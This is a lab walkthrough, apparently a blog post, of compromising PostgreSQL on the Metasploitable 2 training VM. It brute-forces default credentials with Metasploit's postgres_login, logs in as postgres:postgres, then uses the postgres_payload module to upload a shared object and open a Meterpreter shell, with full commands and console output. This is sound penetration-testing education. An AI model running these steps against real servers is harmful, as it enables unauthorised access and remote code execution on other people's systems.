The Nmap scan of Metasploitable 2 revealed:
PORT STATE SERVICE VERSION
5432/tcp open postgresql PostgreSQL DB 8.3.0 – 8.3.7
This exploit is straight forward brute force using Metasploit:
msf > use auxiliary/scanner/postgres/postgres_login msf auxiliary(postgres_login) > set RHOSTS 192.168.1.103 RHOSTS => 192.168.1.103 msf auxiliary(postgres_login) > run [*] 192.168.1.103:5432 Postgres - [01/21] - Trying username:'postgres' with password:'' on database 'template1' [-] 192.168.1.103:5432 Postgres - Invalid username or password: 'postgres':'' [-] 192.168.1.103:5432 Postgres - [01/21] - Username/Password failed. [*] 192.168.1.103:5432 Postgres - [02/21] - Trying username:'' with password:'' on database 'template1' [-] 192.168.1.103:5432 Postgres - Invalid username or password: '':'' [-] 192.168.1.103:5432 Postgres - [02/21] - Username/Password failed. [*] 192.168.1.103:5432 Postgres - [03/21] - Trying username:'scott' with password:'' on database 'template1' [-] 192.168.1.103:5432 Postgres - Invalid username or password: 'scott':'' [-] 192.168.1.103:5432 Postgres - [03/21] - Username/Password failed. [*] 192.168.1.103:5432 Postgres - [04/21] - Trying username:'admin' with password:'' on database 'template1' [-] 192.168.1.103:5432 Postgres - Invalid username or password: 'admin':'' [-] 192.168.1.103:5432 Postgres - [04/21] - Username/Password failed. [*] 192.168.1.103:5432 Postgres - [05/21] - Trying username:'postgres' with password:'postgres' on database 'template1' [+] 192.168.1.103:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres' [+] 192.168.1.103:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)
And there we have it; username and password are both postgres.
So let’s connect via the postgres client in the Terminal:
# psql -h 192.168.1.103 -U postgres -W Password for user postgres: psql (9.1.9, server 8.3.1) WARNING: psql version 9.1, server version 8.3. Some psql features might not work. SSL connection (cipher: DHE-RSA-AES256-SHA, bits: 256) Type "help" for help. postgres=# \l List of databases Name | Owner | Encoding | Access privileges -----------+----------+----------+----------------------- postgres | postgres | UTF8 | template0 | postgres | UTF8 | =c/postgres + | | | postgres=CTc/postgres template1 | postgres | UTF8 | =c/postgres + | | | postgres=CTc/postgres (3 rows) postgres=#
Below is a video demonstrating the above with additional post exploitation maneuvers:
Now we have the password we can also use Metasploit to obtain a Meterpreter shell:
msf > use exploit/linux/postgres/postgres_payload msf exploit(postgres_payload) > set RHOST 192.168.1.103 RHOST => 192.168.1.103 msf exploit(postgres_payload) > show options Module options (exploit/linux/postgres/postgres_payload): Name Current Setting Required Description ---- --------------- -------- ----------- DATABASE template1 yes The database to authenticate against PASSWORD no The password for the specified username. Leave blank for a random password. RHOST 192.168.1.103 yes The target address RPORT 5432 yes The target port USERNAME postgres yes The username to authenticate as VERBOSE false no Enable verbose output Exploit target: Id Name -- ---- 0 Linux x86 msf exploit(postgres_payload) > set PASSWORD postgres PASSWORD => postgres msf exploit(postgres_payload) > set PAYLOAD linux/x86/meterpreter/bind_tcp PAYLOAD => linux/x86/meterpreter/bind_tcp msf exploit(postgres_payload) > exploit [*] Started bind handler [*] 192.168.1.103:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4) [*] Uploaded as /tmp/fTDEMbhY.so, should be cleaned up automatically [*] Transmitting intermediate stager for over-sized stage...(100 bytes) [*] Sending stage (1126400 bytes) to 192.168.1.103 [*] Meterpreter session 1 opened (192.168.1.78:49575 -> 192.168.1.103:4444) at 2013-11-20 08:04:41 +0000 meterpreter >